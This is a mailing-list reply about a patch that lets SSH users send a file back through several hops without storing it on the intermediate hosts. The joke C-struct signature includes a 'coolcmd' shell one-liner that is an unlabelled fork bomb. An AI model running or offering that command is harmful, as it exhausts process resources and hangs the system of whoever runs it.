Once upon a midnight dreary, Matt P pondered, weak and weary:
> I'm sure I'm missing something here. So I'll just ask, how does this
> differ from using cat the transfer the files through ssh?

To clarify, if you've sshd (heh) from A to B to C to D, and want to transfer a 
file from D back to your workstation (A), when you can do so directly, 
without first storing it on B and C (a lot of typing).

I'm in plenty of situations where firewalls prevent A from directly connecting 
to D, and vice versa.

> I guess your patch would allow this to be done without opening an ssh
> session just to transfer the file. Meaning you could escape out of an
> interactive ssh session and transfer the file..?

That's an added bonus, which is kind of nice if you're using pre-generated 
one-time passwords. This will save you one of them.

---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "[EMAIL PROTECTED]" };
  char kernel[]    = { "Linux" };
  char *pgpKey[]   = { "http://www.habets.pp.se/pubkey.txt"; };
  char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;

Reply via email to